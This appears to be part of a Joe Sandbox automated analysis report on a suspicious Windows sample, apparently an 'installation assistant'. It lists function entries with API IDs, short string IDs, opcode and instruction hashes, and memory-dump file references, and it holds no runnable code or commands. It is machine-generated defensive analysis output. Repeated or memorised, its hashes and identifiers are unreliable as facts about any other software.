                              • API String ID: 3415659256-3110269457
                              • Opcode ID: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction ID: 24c4d9b71eb8d13495b1cb5aa84cbdcaad4a2fa9e72b4e14a7c1f9a31ca86c94
                              • Opcode Fuzzy Hash: ac62a312e9615e63fe83044f2985e6da76b9d9f2e0a1fb3315288c38c591097e
                              • Instruction Fuzzy Hash: 1F61C032A016099FDF01CF54C584BEE77F1AF8530DF268058DA58ABA85F775EA05CBA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: 6644b205c568cf89c19727742f47f5e7dc50636248e763b17dbaa96af56c523c
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: A8518275A00709DFDB10CFA5C880AEEB3B5FB84358F168919EA01E7645E775F906CB60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction ID: 57a92bdfc2dccae713512c08e0c88b3e40d8b184f87e895a272a6363e5385042
                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction Fuzzy Hash: E5518DB0904249EFCF04DFD5D9808EEBBB1BF49318F10852EE516BBA50E731998ACB10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: PdJ$Q
                              • API String ID: 3519838083-3674001488
                              • Opcode ID: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction ID: 1c12f41ebfb2bd6e5a0f9da23aff29a83130c29bb22cc40324101ad6ecf0a3d0
                              • Opcode Fuzzy Hash: 87eb3cb62c03194caae5458ff4b741e3c8b0552ef8959399e26f931c5ab5bbcd
                              • Instruction Fuzzy Hash: 1941DEB5D00645DBCF14DFE9C5909DDB3B0FF49318B10812AE92ABBA50E3309E49CBA5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 18bd89f0eaac35264a6193d465f78ebdcac56fe4c60f21d2ab96143eaeb4153f
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: E0416D31705785EFCB11DFA4D4907FABBA2FF85308F04846EE15A97A50EB31A905CB92
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 7d27273d1104bbd44b1c7c4ee5a9eaa1b6ae2ddf32a623490bfcda06558c2af0
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: 362156B1A007046FD7308FA9C880B6BFAFDFB84758F10895EA146D7B40D774A9448B65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: 5dc618c15d26960579ac225b4658b5423060c0b375243294729b5a290fbef71f
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 340180B2E01349DADB10DFA984806AEF7B4FF59708F40842EE569F3A50D3749904CB9A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: d4df213534155538792573afbea5d2440b97e6c27b7f09f542367355ce24f2e3
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: 0E117971A0024ADBCB00DF99C4905AEF7B4FF58348B50C86EE469E7A00E3389A05CB99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 43fc223ef6c45e7e93662e2851f10d40de78d585b1ae1846c9a8657820d92568
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: 6701BCB1A117119FD724CF59C5047AABBF8EF85729F10C85E9062A3B40D7F8A5088BA4
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCCAFCC
                                • Part of subcall function 6CCCA4D1: __EH_prolog.LIBCMT ref: 6CCCA4D6
                                • Part of subcall function 6CCC914B: __EH_prolog.LIBCMT ref: 6CCC9150
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: b9d51e9df76cbca80d406eb84b83401813892225c9fb111f0d0e21db6858153d
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: D00105B1900B50CFC325CF55C5A428AFBE0BB15308F90C95EC0A657B50E7B8A508CB68
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCC43F9
                                • Part of subcall function 6CCC4320: __EH_prolog.LIBCMT ref: 6CCC4325
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: `)L$|{J
                              • API String ID: 3519838083-2198066115
                              • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction ID: 4ce8a0bc5a2862ae69faa3cd00000b31806bd8fa5f162e605acc5cd55365691a
                              • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                              • Instruction Fuzzy Hash: 3EF08272610114FFCB059F94DC04BDE7BB9FF45314F00802AF515A6650DBB96A15CB95
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: a24309db4b29c1100706f1445a2be5c858e7ab63efcaf68b29cf6974735e3263
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: C8E0ED32A02210DBDB049F88C820BDEF7A4EF85728F11001FE015B3B51DBB1A800C780
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 495c65ae17fc31ff2f5c06e9509f1dd22e718ab3de5301895c4bdea5c6591a3b
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: 7B51A1719052099FCF01CF95D840BDFBBB1BF1A32CF10442AE81667A90FB75A949CB51
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: acb7d17cc4bb1bfbc4c9484ee25437ae1d071cd7f64cc98271883d5199a39e9e
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: 37F017B06017009EC3608F06D54869BBBF4EB4270AF50C91EE19A9BA40D3B8A5088FB8